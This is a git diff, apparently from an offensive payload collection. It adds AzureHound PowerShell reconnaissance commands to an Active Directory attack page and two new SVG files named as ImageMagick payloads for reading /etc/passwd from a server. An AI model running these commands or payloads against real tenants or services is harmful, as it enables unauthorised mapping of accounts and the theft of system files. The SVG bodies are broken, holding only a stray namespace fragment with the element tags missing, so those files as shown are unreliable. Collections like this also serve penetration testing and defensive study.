diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 9af421a..d379470 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -141,6 +141,17 @@ ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access ``` +* [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350) + + ```powershell + # require: Install-Module -name Az -AllowClobber + # require: Install-Module -name AzureADPreview -AllowClobber + Connect-AzureAD + Connect-AzAccount + . .\AzureHound.ps1 + Invoke-AzureHound + ``` + * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) ```powershell diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg new file mode 100644 index 0000000..64cb757 --- /dev/null +++ b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg @@ -0,0 +1,5 @@ + +xmlns="http://www.w3.org/2000/svg"> + + \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg new file mode 100644 index 0000000..7981193 --- /dev/null +++ b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg @@ -0,0 +1,5 @@ + +xmlns="http://www.w3.org/2000/svg"> + + \ No newline at end of file